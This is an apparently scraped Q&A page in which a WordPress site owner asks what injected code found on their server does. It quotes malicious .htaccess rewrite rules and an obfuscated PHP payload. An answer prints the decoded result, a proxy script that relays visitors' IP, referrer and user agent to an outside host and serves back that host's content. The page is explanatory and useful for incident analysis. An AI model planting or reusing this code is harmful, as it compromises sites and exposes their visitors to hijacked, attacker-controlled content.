php - What does this code mean? (Virus Looking) -


i'm wondering if can figure out code in php does

i've removed i'm curious how got there , does

i found in 1 of wordpress sites

<ifmodule mod_rewrite.c> rewriteengine on rewritebase / rewritecond %{request_filename} !-f  rewritecond %{request_filename} !-d  rewriterule ^(emyiac-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/emyiacimwqkfv-.php?p=$2 [l] </ifmodule> <ifmodule mod_rewrite.c> rewriteengine on rewritebase / rewritecond %{request_filename} !-f  rewritecond %{request_filename} !-d  rewriterule ^(auyaix-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/auyaixfblclcc-.php?p=$2 [l] </ifmodule>

and 1 of files contains this:

<?php $twrgwh3="6jsmopajz5bi5ll2wfsshqb3cbfkzgglmnzballue/hi5mpz9xq6wo21mqnxzanqaave8x/gnjbnvd0debpcdpd1hooisjwuwreeae1cv3dnihxxxbdwak5n7utesioeklq7hhx+frlp/esrtlfegphdf2y698rzsyrsp0ru8aas3bh+gb6j+1d03qnas/puqreutrztetiqci4luho4grxzkp/6txuk+an3fzwobi6ini3yxbgckpoop3wvviikz9c3jusg/efggqslnyo+ecmek1vl+niibbo8z9n+da/vrm4z0deobnbibpltrxqupmox1/ssphphogtvqi2mdbjqqeinevjitwi+bnpngjpo21mfozu982fxrd/7vdcp1pnboipzklf7xexox0i3tcfvvb8/+5k5o4f8eydpqawmvln7fnr3ss126glakpvi9e6ova6dre78e5xzixe9iguugvayg1kk9vghcicxoj9ti8qaip67w4j/l1scsnggwzxrc41flw0i1xfnzslgoipameiq2vrrvg6fxe8uupsootesuamkzkfcjy8ixoaei5jss4qpfjgdqsvy5wvxx80cqvubj1tfzcfhheotckovoh7qywkyosnh7ow4ql0yxeiar2kizxx8a909pd/kjb3rnmk9qsof5nu0si4ddijb1d5ivu/0lmkiosmqo8zdmrghujkxxqsjrgg4dn+sk1zucaxnj2yqkxcb+4wwljelyklydun19pma7gtuxtzwvf/duje1a4fnqni31zylic4d34avtwqfruabzydkbcrwmabj5n6qtypwofiywm3odv+ifbmmb58uadu44cjqjzre9sg4scillauld8rodigsbldf/zf4nm91lh6x0akjz1xp+ekm5p1zhmjenfzpwmm+oorgi1pwpm2xidyv2wgn+2k+ffycvua5irgqspaerwic/qrrjkp6rago3wzuxwzy3cb9qin/iw2cqrvdsduphw69si16evy5zzydl7mf4wnkcpluyaj2f6i9waqshxxvjyql9lj9b99k58jxivdqdhid16dlzq6loikq10/3nxsn7oiqltwy0limclr0hz6vgdkelm9vjgxloedp9o0y4z+q2kjqos8qm8di3x4lho2smoaufz6enqgsq4jjre8sgn/8jtndq7mfad+dlwiucosqyg==";$kyikqj="\141";$symk1bfi="\x62\x61\x73";$ztmvjgx="\163\164";$yw51kl="fl1ymasdijxwq0bimmp2ifzh9z02quyy1vnwnidebtmhhb";$cbqlfy="\x67\x7a\151";$cbqlfy.="\156\x66";$kyikqj.="\163";$yw51kl.="gnxvymd1ftzkcz+9tdyrqtyacax1za5eqcdxejoefumkao";$symk1bfi.="\x65\66\x34";$ztmvjgx.="\162\137\x72";$ztmvjgx.="\157\x74";$cbqlfy.="\x6c\x61";$symk1bfi.="\x5f\x64\x65\143";$yw51kl.="tywqzqnjobmjwen2wfdrcqixwpxa/xvhhaaezqjkzastpl";$kyikqj.="\163\145";$cbqlfy.="\x74\x65";$symk1bfi.="\x6f\x64\145";$yw51kl.="w5ptsif1uagjhuiwnoimxqpa3pxwhtmtts1gjgnd==";$kyikqj.="\162\x74";$ztmvjgx.="\x31\x33";@$kyikqj($cbqlfy($symk1bfi($ztmvjgx($yw51kl))));?>

since question "what code mean?" here code boils down to.

if you, i'd start looking through access log files entries ?p= included in url.

<?php header('content-type: text/html; charset=utf-8'); $p = 'p';  $host='websys-nt.com'; $path='/wb0454545/'; $srvr=$_server['http_host'].'/';  function getrealip() {  if (!empty($_server['http_client_ip']))   {   $ip=$_server['http_client_ip'];}  elseif (!empty($_server['http_x_forwarded_for']))  {  $ip=$_server['http_x_forwarded_for'];}  else  {   $ip=$_server['remote_addr'];}  return $ip; }   if(isset($_get[$p]))  { $r = getrealip(); if (strpos($_server["http_user_agent"], "ip: ")!==false) $r = substr($_server["http_user_agent"], strpos($_server["http_user_agent"], "ip: ")+4);  $param=$_get[$p]; if (strpos($param, '.js') !== false) { $ext='.js'; $param = str_replace('.js','',$param); $srvr=''; } else if(strpos($param, 'prokl-') !== false) { $ext='.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-")+6)); $param='prokl'; $srvr=''; } else if(strpos($param, '.css') !== false) { $ext='.css'; $param = str_replace('.css','',$param); $srvr=''; } else if(strpos($param, '.gif') !== false) { $ext='.gif'; $param = str_replace('.gif','',$param); $srvr=''; } else if(strpos($param, '.htm') !== false) { $ext='.htm'; $param  = str_replace('.htm','',$param); $srvr=''; } else if(strpos($param, '.jpg') !== false) { $ext='.jpg'; $param = str_replace('.jpg','',$param); $srvr=''; } else if(strpos($param, '.ico') !== false) { $ext='.ico'; $param = str_replace('.ico','',$param); $srvr=''; } else if(strpos($param, '.png') !== false) { $ext='.png'; $param = str_replace('.png','',$param); $srvr=''; } else{ $rf=$_server['http_referer']; $ext='.php?ip='.$r.'&ref='.$ref; } $out =''; $buff = ''; if ($curl = curl_init())         {         curl_setopt($curl, curlopt_url, 'http://'.$host.$path.$srvr.$param.$ext);         curl_setopt($curl, curlopt_returntransfer, true);         curl_setopt($curl, curlopt_useragent, $_server['http_user_agent']);         $out = curl_exec($curl);         curl_close($curl);         }else{         $fp = fsockopen($host, 80, $errno, $errstr, 30); if ($fp) {     $out = "get ".$path.$srvr.$param.$ext." http/1.1\r\n";     $out .= "host: ".$host."\r\n";     $out .= "user-agent: ".$_server['http_user_agent']."\r\n";     $out .= "connection: close\r\n\r\n";     fwrite($fp, $out);     while (!feof($fp)) {         $buff.=fgets($fp, 128);     }     $result = explode("\r\n\r\n", $buff, 2);     $out= $result[1];     fclose($fp); }      }     echo $out;     exit     ;    }        ?>

-

Comments

Post a Comment

Popular posts from this blog

OpenCV OpenCL: Convert Mat to Bitmap in JNI Layer for Android -

there several posts converting mat bitmap using utils.mattobitmap() function. i'm assuming function can called in java layer after importing utils class. i want transfer data memory address pointed uint32_t* bmpcontent; in code below. jniexport void jnicall java_com_nod_nodcv_nodcvactivity_runfilter( jnienv *env, jclass clazz, jobject outbmp, jbytearray indata, jint width, jint height, jint choice, jint filter) { int outsz = width*height; int insz = outsz + outsz/2; androidbitmapinfo bmpinfo; if (androidbitmap_getinfo(env, outbmp, &bmpinfo) < 0) { throwjavaexception(env,"gaussianblur","error retrieving bitmap meta data"); return; } if (bmpinfo.format != android_bitmap_format_rgba_8888) { throwjavaexception(env,"gaussianblur","expecting rgba_8888 format"); return; } uint32_t* bmpcontent; if (androidbitmap_lockpixels(env, outbmp,(void**)&bmpcontent)...
Read more

android - org.xmlpull.v1.XmlPullParserException: expected: START_TAG {http://schemas.xmlsoap.org/soap/envelope/}Envelope -

i trying hit soap api in application login purpose , getting above mentioned error , can 1 tell me going wrong , first time soap apis. here code hit soap :- vector<object> args = new vector<object>(); hashtable<string, object> hashtable = new hashtable<string, object>(); hashtable.put("email", "mss.siddhart28@gmail.com"); hashtable.put("password", "siddharth"); args.add(hashtable); soapserializationenvelope envelope = new soapserializationenvelope( soapenvelope.ver11); envelope.dotnet = true; envelope.xsd = soapserializationenvelope.xsd; envelope.enc = soapserializationenvelope.enc; (new marshalhashtable()).register(envelope); httptransportse androidhttptransport = new httptransportse( "http://tempuri.org/", 15000); androidhttptransport.debug = true; string result = ""; try { soapobject request = new soapobject("http:...
Read more

python - How to remove the Xframe Options header in django? -

i have made page has iframe . inside iframe want show multiple different links article facebook, or news, or youtube video or other possible url. but, due xframe header, unable so. referred following link: https://docs.djangoproject.com/en/1.8/ref/clickjacking/ , django xframeoptionsmiddleware (x-frame-options) - allow iframe client ip but didn't help. my settings.py file's middleware_classes is: middleware_classes = ( 'django.contrib.sessions.middleware.sessionmiddleware', 'django.middleware.common.commonmiddleware', 'django.middleware.csrf.csrfviewmiddleware', 'django.contrib.auth.middleware.authenticationmiddleware', 'django.contrib.auth.middleware.sessionauthenticationmiddleware', 'django.contrib.messages.middleware.messagemiddleware', 'django.middleware.clickjacking.xframeoptionsmiddleware', ) from http://django-secure.readthedocs.org/en/latest/middleware.html , found using ...
Read more